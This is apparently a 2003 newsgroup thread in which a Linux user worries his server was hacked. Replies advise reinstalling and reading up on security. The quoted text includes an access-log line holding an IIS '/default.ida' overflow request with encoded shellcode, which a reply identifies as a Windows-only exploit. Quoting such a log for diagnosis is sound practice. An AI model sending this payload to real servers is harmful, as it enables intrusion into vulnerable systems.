I agree - they seem to have root access if they were able to try mailing all that info.

[snipp]

> Also I found some strange things in /var/log/httpd/access_log
>
> 218.236.111.207 - - [27/Jun/2003:03:32:20 +0900] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
> XXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%u
> cbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a
> HTTP/1.0" 404 283 "-" "-"
>
> Here, this is strange. "GET /default.ida" looks like hacking, doesn't
> it??

This is a Windows-only exploit, against IIS - don't worry about that one.

> What should I do?? Where can I learn more about security??

You should really try to read up some on security, yes. Reading from the email, it seems you were running quite a few servers, RPC and SMB for example - maybe you should take the time to re-install your server (do not back up any binaries/programs) and start reading some security books?

You didn't really write what distribution you were using, but if you start at www.linuxsecurity.org and go from there, you will find some good security guides to follow the next time. http://www.redhat.com/solutions/security/ could be a good starting point as well. And, of course, searching Google Groups could prove quite helpful.

Khay.
I think it was Min,Lee who said:

>I think my server box is hacked !!

Maybe you're looking in all the wrong places....

> X-Newsreader:
> Microsoft Outlook Express 6.00.2600.0000

F.T.
--
Supporting alternative software now ensures that we will be able to choose it in the future. Just say No to Microsoft.
Fred Tourette <toomuchspam@myinbasket.com> wrote in news:3aVKa.24359$0v4.1859704@bgtnsc04-news.ops.worldnet.att.net:

> I think it was Min,Lee who said:
>
>>I think my server box is hacked !!
>
> Maybe you're looking in all the wrong places....
>
>> X-Newsreader:
>> Microsoft Outlook Express 6.00.2600.0000
>
> F.T.

Oh my, you must be really proud of yourself now, reading all his 66KB of information only to comment on his newsreader...

Khay.